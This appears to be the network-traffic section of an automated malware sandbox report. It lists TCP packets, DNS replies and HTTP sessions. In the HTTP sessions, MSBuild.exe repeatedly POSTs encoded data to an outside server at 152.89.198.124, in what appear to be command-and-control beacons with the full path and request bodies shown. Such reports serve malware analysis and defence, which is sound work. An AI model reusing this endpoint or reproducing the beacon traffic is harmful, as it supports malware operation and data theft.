                                                                                                Oct 27, 2024 17:11:50.049566984 CET4435798313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:50.051301956 CET57989443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:50.051361084 CET4435798913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:50.051450014 CET57989443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:50.051561117 CET57989443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:50.051575899 CET4435798913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:50.669986963 CET4435798513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:50.670640945 CET57985443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:50.670686960 CET4435798513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:50.671118975 CET57985443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:50.671133041 CET4435798513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:50.673831940 CET4435798813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:50.674139977 CET57988443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:50.674200058 CET4435798813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:50.674396992 CET57988443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:50.674427032 CET4435798813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:50.675698042 CET4435798713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:50.675908089 CET57987443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:50.675926924 CET4435798713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:50.676196098 CET57987443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:50.676207066 CET4435798713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:50.691617012 CET4435798613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:50.692249060 CET57986443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:50.692265034 CET4435798613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:50.692626953 CET57986443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:50.692631960 CET4435798613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:50.802448034 CET4435798813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:50.802592993 CET4435798813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:50.802659988 CET57988443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:50.802791119 CET57988443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:50.802826881 CET4435798813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:50.802851915 CET57988443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:50.802866936 CET4435798813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:50.808449984 CET4435798713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:50.808474064 CET4435798713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:50.808549881 CET4435798713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:50.808582067 CET57987443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:50.808621883 CET57987443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:50.810934067 CET57987443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:50.810935020 CET57987443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:50.810971022 CET4435798713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:50.810995102 CET4435798713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:50.828169107 CET57990443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:50.828226089 CET4435799013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:50.828304052 CET57990443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:50.828586102 CET57990443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:50.828630924 CET4435799013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:50.829106092 CET57991443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:50.829157114 CET4435799113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:50.829221964 CET57991443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:50.829323053 CET57991443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:50.829350948 CET4435799113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:50.830123901 CET4435798613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:50.830189943 CET4435798613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:50.830255985 CET57986443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:50.830265045 CET4435798613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:50.830305099 CET57986443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:50.830315113 CET4435798613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:50.830364943 CET57986443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:50.830425024 CET57986443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:50.830435038 CET4435798613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:50.830445051 CET57986443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:50.830450058 CET4435798613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:50.832215071 CET57992443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:50.832252979 CET4435799213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:50.832315922 CET57992443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:50.832412004 CET57992443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:50.832427025 CET4435799213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:50.922555923 CET4435798513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:50.922626019 CET4435798513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:50.922668934 CET4435798513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:50.922822952 CET57985443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:50.922823906 CET57985443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:50.922853947 CET4435798513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:50.922924995 CET57985443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.042320967 CET4435798513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.042387962 CET4435798513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.042416096 CET57985443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.042433023 CET4435798513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.042463064 CET57985443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.042486906 CET57985443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.042499065 CET4435798513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.042582035 CET4435798513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.042639971 CET57985443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.042829037 CET57985443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.042850018 CET4435798513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.042871952 CET57985443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.042886019 CET4435798513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.062000990 CET57993443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.062081099 CET4435799313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.062170982 CET57993443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.068334103 CET57993443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.068383932 CET4435799313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.303878069 CET5797980192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:51.304189920 CET5799480192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:51.465958118 CET8057994152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.466136932 CET5799480192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:51.466300964 CET5799480192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:51.467067957 CET8057979152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.467158079 CET5797980192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:51.473256111 CET8057994152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.597634077 CET4435799013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.598982096 CET57990443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.599045038 CET4435799013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.599647045 CET57990443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.599661112 CET4435799013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.601443052 CET4435799213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.601880074 CET57992443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.601907969 CET4435799213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.602745056 CET57992443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.602750063 CET4435799213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.663511038 CET4435799113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.664143085 CET57991443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.664180040 CET4435799113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.664699078 CET57991443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.664710999 CET4435799113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.728039026 CET4435799013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.728108883 CET4435799013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.728281021 CET57990443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.728527069 CET57990443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.728574038 CET4435799013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.728601933 CET57990443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.728619099 CET4435799013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.732172966 CET57995443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.732217073 CET4435799513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.732322931 CET57995443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.732497931 CET57995443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.732523918 CET4435799513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.732700109 CET4435799213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.732759953 CET4435799213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.732815027 CET57992443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.732830048 CET4435799213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.732872963 CET4435799213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.732928038 CET57992443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.732963085 CET57992443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.732963085 CET57992443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.732975006 CET4435799213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.732983112 CET4435799213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.735517979 CET57996443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.735557079 CET4435799613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.735637903 CET57996443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.735814095 CET57996443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.735832930 CET4435799613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.794881105 CET4435799113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.795018911 CET4435799113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.795087099 CET57991443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.795183897 CET57991443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.795211077 CET4435799113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.795234919 CET57991443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.795248985 CET4435799113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.797535896 CET57997443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.797594070 CET4435799713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.797697067 CET57997443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.797904015 CET57997443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.797940016 CET4435799713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.801613092 CET4435798913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.801968098 CET57989443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.801985025 CET4435798913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.802346945 CET57989443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.802356958 CET4435798913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.807573080 CET4435799313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.807873964 CET57993443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.807897091 CET4435799313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.808216095 CET57993443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.808228016 CET4435799313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.931936979 CET4435798913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.932143927 CET4435798913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.932209969 CET57989443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.932261944 CET57989443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.932261944 CET57989443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.932290077 CET4435798913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.932310104 CET4435798913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.937310934 CET4435799313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.937454939 CET4435799313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.937517881 CET57993443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.937576056 CET57993443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.937576056 CET57993443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:51.937611103 CET4435799313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:51.937635899 CET4435799313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:52.348561049 CET8057994152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:52.348825932 CET5799480192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:52.470648050 CET4435799613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:52.471087933 CET57996443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:52.471101999 CET4435799613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:52.471539974 CET57996443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:52.471544981 CET4435799613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:52.480633020 CET4435799513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:52.480988979 CET57995443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:52.481034040 CET4435799513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:52.481332064 CET57995443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:52.481343985 CET4435799513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:52.533518076 CET4435799713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:52.533941031 CET57997443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:52.533973932 CET4435799713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:52.534320116 CET57997443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:52.534332991 CET4435799713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:52.600220919 CET4435799613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:52.600378036 CET4435799613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:52.600447893 CET57996443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:52.600647926 CET57996443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:52.600657940 CET4435799613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:52.600667953 CET57996443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:52.600672960 CET4435799613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:52.617356062 CET4435799513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:52.617439032 CET4435799513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:52.617531061 CET57995443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:52.617619991 CET57995443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:52.617649078 CET4435799513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:52.617701054 CET57995443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:52.617717028 CET4435799513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:52.672517061 CET4435799713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:52.672684908 CET4435799713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:52.672760963 CET57997443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:52.672879934 CET57997443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:52.672879934 CET57997443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:52.672928095 CET4435799713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:52.672954082 CET4435799713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:53.850694895 CET5799480192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:53.850997925 CET5799880192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:53.856435061 CET8057998152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:53.856549978 CET5799880192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:53.856636047 CET8057994152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:53.856777906 CET5799880192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:53.856780052 CET5799480192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:53.862143993 CET8057998152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:54.997221947 CET8057998152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:54.997339010 CET5799880192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:54.999809027 CET8057998152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:54.999877930 CET5799880192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:56.622447014 CET5799880192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:56.623209953 CET5799980192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:56.628314972 CET8057998152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:56.628367901 CET5799880192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:56.628598928 CET8057999152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:56.628686905 CET5799980192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:56.628777027 CET5799980192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:56.634058952 CET8057999152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:57.533793926 CET8057999152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:57.533907890 CET5799980192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:59.038259029 CET5799980192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:59.038501978 CET5800080192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:59.044090986 CET8058000152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:59.044167042 CET5800080192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:59.044260979 CET5800080192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:59.044605017 CET8057999152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:59.044672012 CET5799980192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:59.049808025 CET8058000152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:59.950566053 CET8058000152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:59.950645924 CET5800080192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:12:01.602781057 CET5800080192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:12:01.603101015 CET5800180192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:12:01.608552933 CET8058001152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:12:01.608630896 CET5800180192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:12:01.608724117 CET8058000152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:12:01.608752966 CET5800180192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:12:01.608773947 CET5800080192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:12:01.614116907 CET8058001152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:12:02.503149986 CET8058001152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:12:02.503242970 CET5800180192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:12:04.022700071 CET5800180192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:12:04.022985935 CET5800280192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:12:04.028824091 CET8058002152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:12:04.028918028 CET8058001152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:12:04.028928041 CET5800280192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:12:04.028976917 CET5800180192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:12:04.029129982 CET5800280192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:12:04.034611940 CET8058002152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:12:04.953649998 CET8058002152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:12:04.953737974 CET5800280192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:12:06.587407112 CET5800280192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:12:06.587718964 CET5800380192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:12:06.593466997 CET8058002152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:12:06.593745947 CET8058003152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:12:06.593772888 CET5800280192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:12:06.593841076 CET5800380192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:12:06.594054937 CET5800380192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:12:06.599710941 CET8058003152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:12:07.455554962 CET8058003152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:12:07.456993103 CET5800380192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:12:08.962342024 CET5800380192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:12:08.962877989 CET5800480192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:12:08.968251944 CET8058003152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:12:08.968317986 CET8058004152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:12:08.968348026 CET5800380192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:12:08.968403101 CET5800480192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:12:08.968569994 CET5800480192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:12:08.973975897 CET8058004152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:12:09.870383978 CET8058004152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:12:09.870563984 CET5800480192.168.2.4152.89.198.124
                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Oct 27, 2024 17:10:48.795819998 CET5349299162.159.36.2192.168.2.4
                                                                                                Oct 27, 2024 17:10:49.443651915 CET53498861.1.1.1192.168.2.4
                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                Oct 27, 2024 17:10:24.215651989 CET1.1.1.1192.168.2.40x4a96No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                Oct 27, 2024 17:10:24.215651989 CET1.1.1.1192.168.2.40x4a96No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                Oct 27, 2024 17:10:59.915761948 CET1.1.1.1192.168.2.40x8b44No error (0)shed.dual-low.s-part-0023.t-0009.t-msedge.nets-part-0023.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                Oct 27, 2024 17:10:59.915761948 CET1.1.1.1192.168.2.40x8b44No error (0)s-part-0023.t-0009.t-msedge.net13.107.246.51A (IP address)IN (0x0001)false
                                                                                                • 152.89.198.124
                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.2.457713152.89.198.124802284C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 27, 2024 17:11:00.752402067 CET160OUTPOST /8bdDsv3dk2FF/index.php HTTP/1.1
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Host: 152.89.198.124
                                                                                                Content-Length: 4
                                                                                                Cache-Control: no-cache
                                                                                                Data Raw: 73 74 3d 73
                                                                                                Data Ascii: st=s
                                                                                                Oct 27, 2024 17:11:01.637686014 CET219INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Sun, 27 Oct 2024 16:11:01 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Refresh: 0; url = Login.php
                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 1 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                1192.168.2.457723152.89.198.124802284C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 27, 2024 17:11:03.170928955 CET312OUTPOST /8bdDsv3dk2FF/index.php HTTP/1.1
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Host: 152.89.198.124
                                                                                                Content-Length: 154
                                                                                                Cache-Control: no-cache
                                                                                                Data Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31
